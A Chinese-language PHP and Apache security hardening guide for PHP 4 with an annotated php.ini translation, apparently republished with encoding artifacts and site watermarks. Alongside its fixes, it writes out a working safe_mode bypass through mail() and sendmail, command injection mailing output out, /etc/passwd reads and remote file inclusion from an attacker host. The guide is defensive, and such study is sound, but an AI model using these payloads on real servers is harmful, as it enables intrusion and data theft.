一、Web服務(wù)器安全

PHP其實不過是Web服務(wù)器的一個模塊功能，所以首先要保證Web服務(wù)器的安全。當(dāng)然Web服務(wù)器要安全又必須是先保證系統(tǒng)安全，這樣就扯遠了，無窮無盡。PHP可以和各種Web服務(wù)器結(jié)合，這里也只討論Apache。非常建議以chroot方式安裝啟動Apache，這樣即使Apache和PHP及其腳本出現(xiàn)漏洞，受影響的也只有這個禁錮的系統(tǒng)，不會危害實際系統(tǒng)。但是使用chroot的Apache后，給應(yīng)用也會帶來一定的麻煩，比如連接mysql時必須用127.0.0.1地址使用tcp連接而不能用localhost實現(xiàn)socket連接，這在效率上會稍微差一點。還有mail函數(shù)發(fā)送郵件也是個問題，因為php.ini里的：

[mail function] For Win32 only.SMTP = localhost For Win32 only.sendmail_from [email protected]

都是針對Win32平臺，所以需要在chroot環(huán)境下調(diào)整好sendmail。

二、PHP本身問題 網(wǎng)管u家u.bitscn@com

1、遠程溢出

PHP-4.1.2以下的所有版本都存在文件上傳遠程緩沖區(qū)溢出漏洞，而且攻擊程序已經(jīng)廣泛流傳，成功率非常高.

2、遠程拒絕服務(wù)

PHP-4.2.0和PHP-4.2.1存在PHP multipart/form-data POST請求處理遠程漏洞，雖然不能獲得本地用戶權(quán)限，但是也能造成拒絕服務(wù)。

3、safe_mode繞過漏洞

還有PHP-4.2.2以下到PHP-4.0.5版本都存在PHP mail函數(shù)繞過safe_mode限制執(zhí)行命令漏洞，4.0.5版本開始mail函數(shù)增加了第五個參數(shù)，由于設(shè)計者考慮不周可以突破safe_mode的限制執(zhí)行命令。其中4.0.5版本突破非常簡單，只需用分號隔開后面加shell命令就可以了，比如存在PHP腳本evil.php：

執(zhí)行如下的URL：

http://foo.com/evil.php?bar=;/usr/bin/id　[email protected]

這將id執(zhí)行的結(jié)果發(fā)送給[email protected]。

對于4.0.6至4.2.2的PHP突破safe_mode限制其實是利用了sendmail的-C參數(shù)，所以系統(tǒng)必須是使用sendmail。如下的代碼能夠突破safe_mode限制執(zhí)行命令：

#注意，下面這兩個必須是不存在的，或者它們的屬主和本腳本的屬主是一樣$script='/tmp/script123';$cf='/tmp/cf123';$fd = fopen($cf, 'w');fwrite($fd, 'OQ/tmpSparse=0R$*' . chr(9) . '$#local $@ $:Mlocal, P=/bin/sh, A=sh $script');fclose($fd);$fd = fopen($script, 'w');fwrite($fd, 'rm -f $script $cf; ');fwrite($fd, $cmd);fclose($fd);mail('nobody', '', '', '', '-C$cf');?>

還是使用以上有問題版本PHP的用戶一定要及時升級到最新版本，這樣才能消除基本的安全問題。

三、PHP本身的安全配置

PHP的配置非常靈活，可以通過php.ini, httpd.conf, .htaccess文件（該目錄必須設(shè)置了AllowOverride All或Options）進行設(shè)置，還可以在腳本程序里使用ini_set()及其他的特定的函數(shù)進行設(shè)置。通過phpinfo()和get_cfg_var()函數(shù)可以得到配置選項的各個值。

如果配置選項是唯一PHP_INI_SYSTEM屬性的，必須通過php.ini和httpd.conf來修改，它們修改的是PHP的Master值，但修改之后必須重啟apache才能生效。其中php.ini設(shè)置的選項是對Web服務(wù)器所有腳本生效，httpd.conf里設(shè)置的選項是對該定義的目錄下所有腳本生效。

如果還有其他的PHP_INI_USER, PHP_INI_PERDIR, PHP_INI_ALL屬性的選項就可以使用.htaccess文件設(shè)置，也可以通過在腳本程序自身用ini_set()函數(shù)設(shè)定，它們修改的是Local值，改了以后馬上生效。但是.htaccess只對當(dāng)前目錄的腳本程序生效，ini_set()函數(shù)只對該腳本程序設(shè)置ini_set()函數(shù)以后的代碼生效。各個版本的選項屬性可能不盡相同，可以用如下命令查找當(dāng)前源代碼的main.c文件得到所有的選項，以及它的屬性：

# grep PHP_INI_ /PHP_SRC/main/main.c

在討論PHP安全配置之前，應(yīng)該好好了解PHP的safe_mode模式。

1、safe_mode

safe_mode是唯一PHP_INI_SYSTEM屬性，必須通過php.ini或httpd.conf來設(shè)置。要啟用safe_mode，只需修改php.ini：safe_mode = On或者修改httpd.conf，定義目錄：

Options FollowSymLinksphp_admin_value safe_mode 1

重啟apache后safe_mode就生效了。啟動safe_mode，會對許多PHP函數(shù)進行限制，特別是和系統(tǒng)相關(guān)的文件打開、命令執(zhí)行等函數(shù)。

所有操作文件的函數(shù)將只能操作與腳本UID相同的文件，比如test.php腳本的內(nèi)容為：幾個文件的屬性如下：# ls -latotal 13drwxr-xr-x 2 root root 104 Jul 20 01:25 .drwxr-xr-x 16 root root 384 Jul 18 12:02 ..-rw-r--r-- 1 root root 4110 Oct 26 2002 index.html-rw-r--r-- 1 www-data www-data 41 Jul 19 19:14 test.php在瀏覽器請求test.php會提示如下的錯誤信息：

Warning: SAFE MODE Restriction in effect. The script whose uid/gid is 33/33 is not allowed to access ./index.html owned by uid/gid 0/0 in /var/www/test.php on line 1如果被操作文件所在目錄的UID和腳本UID一致，那么該文件的UID即使和腳本不同也可以訪問的，不知這是否是PHP的一個漏洞還是另有隱情。所以php腳本屬主這個用戶最好就只作這個用途，絕對禁止使用root做為php腳本的屬主，這樣就達不到safe_mode的效果了。

如果想將其放寬到GID比較，則打開 safe_mode_gid可以考慮只比較文件的GID，可以設(shè)置如下選項：

safe_mode_gid = On

設(shè)置了safe_mode以后，所有命令執(zhí)行的函數(shù)將被限制只能執(zhí)行php.ini里safe_mode_exec_dir指定目錄里的程序，而且shell_exec、`ls -l`這種執(zhí)行命令的方式會被禁止。如果確實需要調(diào)用其它程序，可以在php.ini做如下設(shè)置：

safe_mode_exec_dir = /usr/local/php/exec

然后拷貝程序到該目錄，那么php腳本就可以用system等函數(shù)來執(zhí)行該程序。而且該目錄里的shell腳本還是可以調(diào)用其它目錄里的系統(tǒng)命令。

safe_mode_include_dir string

當(dāng)從此目錄及其子目錄（目錄必須在 include_path 中或者用完整路徑來包含）包含文件時越過 UID/GID 檢查。

從 PHP 4.2.0 開始，本指令可以接受和 include_path 指令類似的風(fēng)格用分號隔開的路徑，而不只是一個目錄。

指定的限制實際上是一個前綴，而非一個目錄名。這也就是說“safe_mode_include_dir = /dir/incl”將允許訪問“/dir/include”和“/dir/incls”，如果它們存在。如果您希望將訪問控制在一個指定的目錄，那么請在結(jié)尾加上一個斜線，例如：“safe_mode_include_dir = /dir/incl/”。

safe_mode_allowed_env_vars string

設(shè)置某些環(huán)境變量可能是潛在的安全缺口。本指令包含有一個逗號分隔的前綴列表。在安全模式下，用戶只能改變那些名字具有在這里提供的前綴的環(huán)境變量。默認(rèn)情況下，用戶只能設(shè)置以 PHP_ 開頭的環(huán)境變量（例如 PHP_FOO = BAR）。

注: 如果本指令為空，PHP 將使用戶可以修改任何環(huán)境變量！

safe_mode_protected_env_vars string

本指令包含有一個逗號分隔的環(huán)境變量的列表，最終用戶不能用 putenv() 來改變這些環(huán)境變量。甚至在 safe_mode_allowed_env_vars 中設(shè)置了允許修改時也不能改變這些變量。

雖然safe_mode不是萬能的（低版本的PHP可以繞過），但還是強烈建議打開安全模式，在一定程度上能夠避免一些未知的攻擊。不過啟用safe_mode會有很多限制，可能對應(yīng)用帶來影響，所以還需要調(diào)整代碼和配置才能和諧。被安全模式限制或屏蔽的函數(shù)可以參考PHP手冊。

討論完safe_mode后，下面結(jié)合程序代碼實際可能出現(xiàn)的問題討論如何通過對PHP服務(wù)器端的配置來避免出現(xiàn)的漏洞。

2、變量濫用

PHP默認(rèn)register_globals = On，對于GET, POST, Cookie, Environment, Session的變量可以直接注冊成全局變量。它們的注冊順序是variables_order = 'EGPCS'（可以通過php.ini修改），同名變量variables_order右邊的覆蓋左邊，所以變量的濫用極易造成程序的混亂。而且腳本程序員往往沒有對變量初始化的習(xí)慣，像如下的程序片斷就極易受到攻擊：//test_1.phpif ($pass == 'hello')$auth = 1;

if ($auth == 1)echo 'some important information';elseecho 'nothing';?>

攻擊者只需用如下的請求就能繞過檢查：

http://victim/test_1.php?auth=1

這雖然是一個很弱智的錯誤，但一些著名的程序也有犯過這種錯誤，比如phpnuke的遠程文件拷貝漏洞：http://www.securityfocus.com/bid/3361

PHP-4.1.0發(fā)布的時候建議關(guān)閉register_globals，并提供了7個特殊的數(shù)組變量來使用各種變量。對于從GET、POST、COOKIE等來的變量并不會直接注冊成變量，必需通過數(shù)組變量來存取。PHP-4.2.0發(fā)布的時候，php.ini默認(rèn)配置就是register_globals = Off。這使得程序使用PHP自身初始化的默認(rèn)值，一般為0，避免了攻擊者控制判斷變量。

解決方法：

配置文件php.ini設(shè)置register_globals = Off。要求程序員對作為判斷的變量在程序最開始初始化一個值。

3、文件打開

極易受攻擊的代碼片斷：

//test_2.phpif (!($str = readfile('$filename'))) {echo('Could not open file: $filenamen');exit;}else {echo $str;}?>

由于攻擊者可以指定任意的$filename，攻擊者用如下的請求就可以看到/etc/passwd：

http://victim/test_2.php?filename=/etc/passwd

如下請求可以讀php文件本身：

http://victim/test_2.php?filename=test_2.php

PHP中文件打開函數(shù)還有fopen(), file()等，如果對文件名變量檢查不嚴(yán)就會造成服務(wù)器重要文件被訪問讀取。

解決方法：

如非特殊需要，把php的文件操作限制在web目錄里面。以下是修改apache配置文件httpd.conf的一個例子：

php_admin_value open_basedir /usr/local/apache/htdocs重啟apache后，/usr/local/apache/htdocs目錄下的PHP腳本就只能操作它自己目錄下的文件了，否則PHP就會報錯：

Warning: open_basedir restriction in effect.

File is in wrong directory in xxx on line xx.

使用safe_mode模式也能避免這種問題，前面已經(jīng)討論過了。

4、包含文件

極易受攻擊的代碼片斷：

//test_3.phpif(file_exists($filename))include('$filename');?>這種不負責(zé)任的代碼會造成相當(dāng)大的危害，攻擊者用如下請求可以得到/etc/passwd文件：

http://victim/test_3.php?filename=/etc/passwd

如果對于Unix版的PHP（Win版的PHP不支持遠程打開文件）攻擊者可以在自己開了http或ftp服務(wù)的機器上建立一個包含shell命令的文件，如http://attack/attack.txt的內(nèi)容是，那么如下的請求就可以在目標(biāo)主機執(zhí)行命令ls /etc：

http://victim/test_3.php?filename=http://attack/attack.txt

攻擊者甚至可以通過包含apache的日志文件access.log和error.log來得到執(zhí)行命令的代碼，不過由于干擾信息太多，有時不易成功。

對于另外一種形式，如下代碼片斷：

//test_4.phpinclude('$lib/config.php');?>攻擊者可以在自己的主機建立一個包含執(zhí)行命令代碼的config.php文件，然后用如下請求也可以在目標(biāo)主機執(zhí)行命令：

http://victim/test_4.php?lib=http://attack

PHP的包含函數(shù)有include(), include_once(), require(), require_once。如果對包含文件名變量檢查不嚴(yán)就會對系統(tǒng)造成嚴(yán)重危險，可以遠程執(zhí)行命令。

解決方法：

要求程序員包含文件里的參數(shù)盡量不要使用變量，如果使用變量，就一定要嚴(yán)格檢查要包含的文件名，絕對不能由用戶任意指定。

如前面文件打開中限制PHP操作路徑是一個必要的選項。另外，如非特殊需要，一定要關(guān)閉PHP的遠程文件打開功能。修改php.ini文件：

allow_url_fopen = Off

重啟apache

[PHP]　 PHP還是一個不斷發(fā)展的工具，其功能還在不斷地刪減　 而php.ini的設(shè)置更改可以反映出相當(dāng)?shù)淖兓?在使用新的PHP版本前，研究一下php.ini會有好處的　　 關(guān)于這個文件 ;　　

這個文件控制了PHP許多方面的觀點.為了讓PHP讀取這個文件，它必須被命名為　 'php.ini'.PHP 將在這些地方依次查找該文件：當(dāng)前工作目錄；環(huán)境變量PHPRC　 指明的路徑；編譯時指定的路徑.　 在windows下，編譯時的路徑是Windows安裝目錄.　 在命令行模式下，php.ini的查找路徑可以用 -c 參數(shù)替代.　

該文件的語法非常簡單.空白字符和用分號';'開始的行被簡單地忽略（就象你可能　 猜到的一樣）. 章節(jié)標(biāo)題（例如 : [Foo]）也被簡單地忽略，即使將來它們可能　 有某種的意義.　　 指示被指定使用如下語法：　 指示標(biāo)識符 = 值　 directive = value　 指示標(biāo)識符 是 *大小寫敏感的* - foo=bar 不同于 FOO = bar.　　 值可以是一個字符串，一個數(shù)字，一個 PHP 常量 (如： E_ALL or M_PI), INI 常量中的　 一個 (On, Off, True, False, Yes, No and None) ，或是一個表達式　 (如: E_ALL & ~E_NOTICE), 或是用引號括起來的字符串('foo').　 　 INI 文件的表達式被限制于位運算符和括號.　 | bitwise OR　 & bitwise AND　 ~ bitwise NOT　 ! boolean NOT　　 布爾標(biāo)志可用 1, On, True or Yes 這些值置于開的狀態(tài).　 它們可用 0, Off, False or No 這些值置于關(guān)的狀態(tài).　　 一個空字符串可以用在等號后不寫任何東西表示，或者用 None 關(guān)鍵字:　　 foo = ; 將foo置為空字符串　 foo = none ; 將foo置為空字符串　 foo = 'none' ; 將foo置為字符串'none'　　 如果你值設(shè)置中使用常量，而這些常量屬于動態(tài)調(diào)入的擴展庫（不是 PHP 的擴展，就是　 Zend 的擴展），你僅可以調(diào)入這些擴展的行*之后*使用這些常量.　　 所有在 php.ini-dist 文件里設(shè)定的值與內(nèi)建的默認(rèn)值相同（這是說，如果 php.ini　 沒被使用或者你刪掉了這些行，默認(rèn)值與之相同）.　

　 語言選項 ;　　

engine = On　 使 PHP scripting language engine（PHP 腳本語言引擎）在 Apache下有效.　short_open_tag = On　 允許 <? 標(biāo)識（這種簡單表示）. 僅有 <?php and <script> tags 將被識別.　asp_tags = Off　 允許ASP-style <% %> tags　precision = 14　 浮點類型數(shù)顯示時的有效位數(shù)　

y2k_compliance = Off　 是否打開 2000年適應(yīng) (可能在非Y2K適應(yīng)的瀏覽器中導(dǎo)致問題)　

output_buffering = Off　 輸出緩存允許你甚至在輸出正文內(nèi)容之后發(fā)送 header（標(biāo)頭，包括cookies）行　 其代價是輸出層減慢一點點速度.你可以使用輸出緩存在運行時打開輸出緩存，　 或者在這里將指示設(shè)為 On 而使得所有文件的輸出緩存打開.　output_handler = ; 你可以重定向你的腳本的所有輸出到一個函數(shù)，　 那樣做可能對處理或以日志記錄它有用.　 例如若你將這個output_handler 設(shè)為'ob_gzhandler',　 則輸出會被透明地為支持gzip或deflate編碼的瀏覽器壓縮.　 設(shè)一個輸出處理器自動地打開輸出緩沖.　implicit_flush = Off　 強制flush（刷新）讓PHP 告訴輸出層在每個輸出塊之后自動刷新自身數(shù)據(jù).　 這等效于在每個 print() 或 echo() 調(diào)用和每個 HTML 塊后調(diào)用flush()函數(shù).　 打開這項設(shè)置會導(dǎo)致嚴(yán)重的運行時沖突，建議僅在debug過程中打開.　

allow_call_time_pass_reference = On　 是否讓強迫函數(shù)調(diào)用時按引用傳遞參數(shù).這一方法遭到抗議，　 并可能在將來版本的PHP/Zend里不再支持.　 受到鼓勵的指定哪些參數(shù)按引用傳遞的方法是在函數(shù)聲明里.　 你被鼓勵嘗試關(guān)閉這一選項并確認(rèn)你的腳本仍能正常工作，以保證在將來版本的語言里　 它們?nèi)阅芄ぷ?（你將在每次使用該特點時得到一個警告，而參數(shù)將按值而不是按引用　 傳遞）.　

Safe Mode 安全模式　safe_mode = Off　safe_mode_exec_dir =　safe_mode_allowed_env_vars = PHP_　 ？Setting certain environment variables　 ？may be a potential security breach.　 該指示包含用逗號分隔的前綴列表.安全模式中，用戶僅可以替換　

以在此列出的前綴開頭的環(huán)境變量的值.　 默認(rèn)地，用戶將僅能 設(shè)定以PHP_開頭的環(huán)境變量，（如: PHP_FOO=BAR）.　 注意: 如果這一指示為空，PHP 將讓用戶更改任意環(huán)境變量!　

safe_mode_protected_env_vars = LD_LIBRARY_PATH　 這條指示包含一個用逗號分隔的環(huán)境變量列表，那是最終用戶將不能用putenv () 更改的.　 這些變量甚至在safe_mode_allowed_env_vars 設(shè)置為允許的情況下得到保護.　

disable_functions =　 這條指示讓你可以為了安全的原因讓特定函數(shù)失效.　 它接受一個用逗號分隔的函數(shù)名列表.　 這條指示 *不受* 安全模式是否打開的影響.　

語法高亮模式的色彩.　 只要能被<font color=???>接受的東西就能工作.　

highlight.string = #DD0000　highlight.comment = #FF8000　highlight.keyword = #007700　highlight.bg = #FFFFFF　highlight.default = #0000BB　highlight.html = #000000　

Misc 雜項　expose_php = Off　 決定 PHP 是否標(biāo)示它裝在服務(wù)器上的事實（例如：加在它 —PHP—給Web服務(wù)　 發(fā)送的信號上）.　 （我個人的意見，在出現(xiàn)什么power-by的header的時候，把這關(guān)掉.）　 它不會有安全上的威脅, 但它使檢查你的服務(wù)器上是否安裝了PHP成為了可能.　　 Resource Limits ;　　

max_execution_time = 30 ; 每個腳本的最大執(zhí)行時間, 按秒計　memory_limit = 8388608 ; 一個腳本最大可使用的內(nèi)存總量 (這里是8MB)　　 Error handling and logging ;　 出錯控制和登記 ;　　 錯誤報告是按位的.或者將數(shù)字加起來得到想要的錯誤報告等級.　 E_ALL - 所有的錯誤和警告　 E_ERROR - 致命性運行時錯　 E_WARNING - 運行時警告（非致命性錯）　 E_PARSE - 編譯時解析錯誤　 E_NOTICE - 運行時提醒(這些經(jīng)常是是你的代碼的bug引起的，　也可能是有意的行為造成的.(如：基于未初始化的變量自動初始化為一個　

空字符串的事實而使用一個未初始化的變量)　

E_CORE_ERROR - 發(fā)生于PHP啟動時初始化過程中的致命錯誤　 E_CORE_WARNING - 發(fā)生于PHP啟動時初始化過程中的警告(非致命性錯)　 E_COMPILE_ERROR - 編譯時致命性錯　 E_COMPILE_WARNING - 編譯時警告(非致命性錯)　 E_USER_ERROR - 用戶產(chǎn)生的出錯消息　 E_USER_WARNING - 用戶產(chǎn)生的警告消息　 E_USER_NOTICE - 用戶產(chǎn)生的提醒消息　 例子:　 error_reporting = E_ALL & ~E_NOTICE ; 顯示所有的錯誤，除了提醒　 error_reporting = E_COMPILE_ERROR|E_ERROR|E_CORE_ERROR ; 僅顯示錯誤　error_reporting = E_ALL & ~E_NOTICE ; 顯示所有的錯誤，除了提醒　display_errors = On ; 顯示出錯誤信息(作為輸出的一部分)　 在最終發(fā)布的web站點上，強烈建議你關(guān)掉這個特性，并使用　 錯誤日志代替（參看下面）.　 在最終發(fā)布的web站點繼續(xù)讓 display_errors 有效可能　 暴露一些有關(guān)安全的信息，例如你的web服務(wù)上的文件路徑、　 你的數(shù)據(jù)庫規(guī)劃或別的信息.　

display_startup_errors = Off ; 甚至當(dāng)display_erroes打開了，發(fā)生于PHP的啟動的步驟中　 的錯誤也不會被顯示.　 強烈建議保持使 display_startup_errors 關(guān)閉，　 除了在改錯過程中.　log_errors = Off ; 在日志文件里記錄錯誤（服務(wù)器指定的日志，stderr標(biāo)準(zhǔn)錯誤輸出，或error_log(下面的））　 正如上面說明的那樣，強烈建議你在最終發(fā)布的web站點以日志記錄錯誤　 取代直接錯誤輸出.　

track_errors = Off ; 保存最近一個 錯誤/警告 消息于變量 $php_errormsg (boolean)　error_prepend_string = '<font color=ff0000>' ; 于錯誤信息前輸出的字符串　error_append_string = '</font>' ; 于錯誤信息后輸出的字符串　error_log = filename ; 記錄錯誤日志于指定文件　error_log = syslog ; 記錄錯誤日志于系統(tǒng)日志 syslog (NT 下的事件日志, Windows 95下無效)　warn_plus_overloading = Off ; 當(dāng)將‘+’用于字符串時警告　　 Data Handling ;　　variables_order = 'EGPCS' ; 這條指示描述了PHP 記錄　 GET, POST, Cookie, Environment and Built-in 這些變量的順序.　 （以 G, P, C, E & S 代表，通常以 EGPCS 或 GPC 的方式引用）.　 按從左到右記錄，新值取代舊值.　

register_globals = On ; 是否將這些 EGPCS 變量注冊為全局變量.　 若你不想讓用戶數(shù)據(jù)不在全局范圍內(nèi)混亂的話，你可能想關(guān)閉它.　 這和 track_vars 連起來用更有意義 — 這樣你可以通過　 $HTTP_*_VARS[] 數(shù)組訪問所有的GPC變量.　

register_argc_argv = On ; 這條指示告訴 PHP 是否聲明 argv和argc 變量　 （注：這里argv為數(shù)組,argc為變量數(shù)）　 （其中包含用GET方法傳來的數(shù)據(jù)）.　 若你不想用這些變量，你應(yīng)當(dāng)關(guān)掉它以提高性能.　

track_vars = On ; 使$HTTP_*_VARS[]數(shù)組有效，這里*在使用時用　 ENV, POST, GET, COOKIE or SERVER替換　post_max_size = 8M ; PHP將接受的POST數(shù)據(jù)最大大小.　gpc_order = 'GPC' ; 這條指示被人反對.用 variables_order 代替.　

Magic quotes　magic_quotes_gpc = On ; 在輸入的GET/POST/Cookie數(shù)據(jù)里使用魔術(shù)引用　 （原文就這樣，呵呵，所謂magic quotes 應(yīng)該是指用轉(zhuǎn)義符加在引用性的控制字符上，如 '....）　magic_quotes_runtime= Off ; 對運行時產(chǎn)生的數(shù)據(jù)使用魔術(shù)引用，　 例如：用SQL查詢得到的數(shù)據(jù)，用exec()函數(shù)得到的數(shù)據(jù)，等等　magic_quotes_sybase = Off ; 采用 Sybase形式的魔術(shù)引用（用 '' 脫出 ' 而不用 '）　

自動在 PHP 文檔之前和之后添加文件　auto_prepend_file =　auto_append_file =　

象4.04b4一樣，PHP 默認(rèn)地總是在 “Content-type:” 頭標(biāo)輸出一個字符的編碼方式.　 讓輸出字符集失效，只要設(shè)置為空.　 PHP 的內(nèi)建默認(rèn)值是 text/html　default_mimetype = 'text/html'　default_charset = 'iso-8859-1'　

　 Paths and Directories ;　　include_path = ; include 路徑設(shè)置，UNIX: '/path1:/path2' Windows: 'path1;path2'　doc_root = ; php 頁面的根路徑，僅在非空時有效　

user_dir = ; 告知 php 在使用 /~username 打開腳本時到哪個目錄下去找，僅在非空時有效　upload_tmp_dir = ; 存放用HTTP協(xié)議上載的文件的臨時目錄（在沒指定時使用系統(tǒng)默認(rèn)的）　upload_max_filesize = 2097152 ; 文件上載默認(rèn)地限制為2 Meg　extension_dir = c:php ; 存放可加載的擴充庫（模塊）的目錄　enable_dl = On ; 是否使dl()有效.　 在多線程的服務(wù)器上 dl()函數(shù)*不能*很好地工作，　 例如IIS or Zeus，并在其上默認(rèn)為禁止　　 File Uploads ;　　file_uploads = On ; 是否允許HTTP方式文件上載　upload_tmp_dir = ; 用于HTTP上載的文件的臨時目錄（未指定則使用系統(tǒng)默認(rèn)）　upload_max_filesize = 2M ; 上載文件的最大許可大小　

Fopen wrappers ;　　allow_url_fopen = On ; 是否允許把URLs當(dāng)作http:.. 或把文件當(dāng)作ftp:...　　 動態(tài)擴展 ;　 Dynamic Extensions ;　　 若你希望一個擴展庫自動加載，用下面的語法：　 extension=modulename.extension　 例如，在windows上，　 extension=msql.dll　 or 在UNIX下,　 extension=msql.so　 注意，這只應(yīng)當(dāng)是模塊的名字，不需要目錄信息放在里面.　 用上面的 extension_dir 指示指定擴展庫的位置.　Windows 擴展　extension=php_nsmail.dll　extension=php_calendar.dll　extension=php_dbase.dll　extension=php_filepro.dll　extension=php_gd.dll　extension=php_dbm.dll　extension=php_mssql.dll　extension=php_zlib.dll　extension=php_filepro.dll　 extension=php_imap4r2.dll　extension=php_ldap.dll　extension=php_crypt.dll　extension=php_msql2.dll　extension=php_odbc.dll　 注意， MySQL的支持現(xiàn)在是內(nèi)建的，因此，不需要用它的dll　

　 模塊設(shè)定 ;　 Module Settings ;　　

[Syslog]　define_syslog_variables = Off ; 是否定義各種的系統(tǒng)日志變量　 如：$LOG_PID, $LOG_CRON, 等等.　 關(guān)掉它是個提高效率的好主意.　 運行時，你可以調(diào)用函數(shù)define_syslog_variables()，來定義這些變量　

[mail function]　SMTP = localhost ;僅用于win32系統(tǒng)　sendmail_from [email protected]僅用于win32系統(tǒng)　sendmail_path = ;僅用于unix, 也可支持參數(shù)（默認(rèn)的是'sendmail -t -i'）　

[Debugger]　debugger.host = localhost　debugger.port = 7869　debugger.enabled = False　

[Logging]　 這些配置指示用于示例的日志記錄機制.　 看 examples/README.logging 以得到更多的解釋　logging.method = db　logging.directory = /path/to/log/directory　

[Java]　java.class.path = .php_java.jar　java.home = c:jdk　java.library = c:jdkjrebinhotspotjvm.dll　java.library.path = .　

[SQL]　sql.safe_mode = Off　

[ODBC]　uodbc.default_db = Not yet implemented　uodbc.default_user = Not yet implemented　uodbc.default_pw = Not yet implemented　uodbc.allow_persistent = On ; 允許或禁止 持久連接　uodbc.check_persistent = On ; 在重用前檢查連接是否還可用　uodbc.max_persistent = -1 ; 持久連接的最大數(shù).-1 代表無限制　uodbc.max_links = -1 ; 連接的最大數(shù)目（持久和非持久）.-1 代表無限制　 網(wǎng)管u家u.bitsCN.comuodbc.defaultlrl = 4096 ; 控制 LONG 類型的字段.返回變量的字節(jié)數(shù)，0 代表通過（？）0 means passthru　uodbc.defaultbinmode = 1 ; 控制 二進制數(shù)據(jù).0 代表?????Handling of binary data. 0 means passthru, 1 return as is, 2 convert to char　 見有關(guān) odbc_binmode 和 odbc_longreadlen 的文檔以得到 uodbc.defaultlrl 和 uodbc.defaultbinmode 的解釋.　

[MySQL]　mysql.allow_persistent = On ; 允許或禁止 持久連接　mysql.max_persistent = -1 ; 持久連接的最大數(shù).-1 代表無限制　mysql.max_links = -1 ; 連接的最大數(shù)目（持久和非持久）.-1 代表無限制　mysql.default_port = ; mysql_connect() 使用的默認(rèn)端口，如不設(shè)置，mysql_connect()　 將使用變量 $MYSQL_TCP_PORT，或在/etc/services 下的mysql-tcp 條目(unix)，　 或在編譯是定義的 MYSQL_PORT(按這樣的順序)　 Win32環(huán)境，將僅檢查MYSQL_PORT.　mysql.default_socket = ; 用于本地 MySql 連接的默認(rèn)的套接字名.為空，使用 MYSQL 內(nèi)建值　

mysql.default_host = ; mysql_connect() 默認(rèn)使用的主機（安全模式下無效）　

mysql.default_user = ; mysql_connect() 默認(rèn)使用的用戶名（安全模式下無效）　mysql.default_password = ; mysql_connect() 默認(rèn)使用的密碼（安全模式下無效）　 注意，在這個文件下保存密碼通常是一個*壞*主意　 *任何*可以使用PHP訪問的用戶可以運行　 'echo cfg_get_var('mysql.default_password')'來顯示那個密碼!　 而且當(dāng)然地，任何有讀該文件權(quán)力的用戶也能看到那個密碼.　

[mSQL]　msql.allow_persistent = On ; 允許或禁止 持久連接　msql.max_persistent = -1 ; 持久連接的最大數(shù).-1 代表無限制　msql.max_links = -1 ; 連接的最大數(shù)目（持久和非持久）.-1 代表無限制　

[PostgresSQL]　pgsql.allow_persistent = On ; 允許或禁止 持久連接　pgsql.max_persistent = -1 ; 持久連接的最大數(shù).-1 代表無限制　pgsql.max_links = -1 ; 連接的最大數(shù)目（持久和非持久）.-1 代表無限制　

[Sybase]　sybase.allow_persistent = On ; 允許或禁止 持久連接　

sybase.max_persistent = -1 ; 持久連接的最大數(shù).-1 代表無限制　sybase.max_links = -1 ; 連接的最大數(shù)目（持久和非持久）.-1 代表無限制　sybase.interface_file = '/usr/sybase/interfaces'　sybase.min_error_severity = 10 ; 顯示的錯誤的最低嚴(yán)重性　sybase.min_message_severity = 10 ; 顯示的消息的最低重要性　sybase.compatability_mode = Off ; 與舊版的PHP 3.0 兼容的模式.若打開，這將導(dǎo)致 PHP 自動地　 把根據(jù)結(jié)果的 Sybase 類型賦予它們，　 而不是把它們?nèi)?dāng)成字符串.　 這個兼容模式不會永遠留著，　 因此，將你的代碼進行需要的修改，　 并將該項關(guān)閉.　

[Sybase-CT]　sybct.allow_persistent = On ; 允許或禁止 持久連接　sybct.max_persistent = -1 ; 持久連接的最大數(shù).-1 代表無限制　sybct.max_links = -1 ; 連接的最大數(shù)目（持久和非持久）.-1 代表無限制　sybct.min_server_severity = 10 ; 顯示的錯誤的最低嚴(yán)重性　sybct.min_client_severity = 10 ; 顯示的消息的最低重要性　

[bcmath]　bcmath.scale = 0 ; 用于所有bcmath函數(shù)的10十進制數(shù)數(shù)字的個數(shù)number of decimal digits for all bcmath functions　

[browscap]　browscap = extra/browscap.ini　browscap = C:WINSYSTEMinetsrvbrowscap.ini　[Informix]　ifx.default_host = ; ifx_connect() 默認(rèn)使用的主機（安全模式下無效）　ifx.default_user = ; ifx_connect() 默認(rèn)使用的用戶名（安全模式下無效）　ifx.default_password = ; ifx_connect() 默認(rèn)使用的密碼（安全模式下無效）　ifx.allow_persistent = On ; 允許或禁止 持久連接　ifx.max_persistent = -1 ; 持久連接的最大數(shù).-1 代表無限制　ifx.max_links = -1 ; 連接的最大數(shù)目（持久和非持久）.-1 代表無限制　ifx.textasvarchar = 0 ; 若打開，select 狀態(tài)符返回一個 ‘text blob’字段的內(nèi)容，而不是它的id　ifx.byteasvarchar = 0 ; 若打開，select 狀態(tài)符返回一個 ‘byte blob’字段的內(nèi)容，而不是它的id　ifx.charasvarchar = 0 ; 追蹤從固定長度的字符列里剝離的空格.　 可能對 Informix SE 用戶有效.　ifx.blobinfile = 0 ; 若打開，text和byte blobs 的內(nèi)容被導(dǎo)出到一個文件　 而不是保存到內(nèi)存.　ifx.nullformat = 0 ; NULL（空）被作為空字段返回，除非，這里被設(shè)為1.　 這種情況下（為1），NULL作為字串NULL返回.　

[Session]　session.save_handler = files ; 用于保存/取回數(shù)據(jù)的控制方式　session.save_path = C:wintemp ; 在 save_handler 設(shè)為文件時傳給控制器的參數(shù)，　 這是數(shù)據(jù)文件將保存的路徑.　session.use_cookies = 1 ; 是否使用cookies　session.name = PHPSESSID　 用在cookie里的session的名字　session.auto_start = 0 ; 在請求啟動時初始化session　session.cookie_lifetime = 0 ; 為按秒記的cookie的保存時間，　 或為0時，直到瀏覽器被重啟　session.cookie_path = / ; cookie的有效路徑　session.cookie_domain = ; cookie的有效域　session.serialize_handler = php ; 用于連接數(shù)據(jù)的控制器　 php是 PHP 的標(biāo)準(zhǔn)控制器.　session.gc_probability = 1 ; 按百分比的'garbage collection（碎片整理）'進程　 在每次 session 初始化的時候開始的可能性.　 網(wǎng)管bitscn_comsession.gc_maxlifetime = 1440 ; 在這里數(shù)字所指的秒數(shù)后，保存的數(shù)據(jù)將被視為　 '碎片(garbage)'并由gc 進程清理掉.　session.referer_check = ; 檢查 HTTP引用以使額外包含于URLs中的ids無效　session.entropy_length = 0 ; 從文件中讀取多少字節(jié)　session.entropy_file = ; 指定這里建立 session id　 session.entropy_length = 16　 session.entropy_file = /dev/urandom　session.cache_limiter = nocache 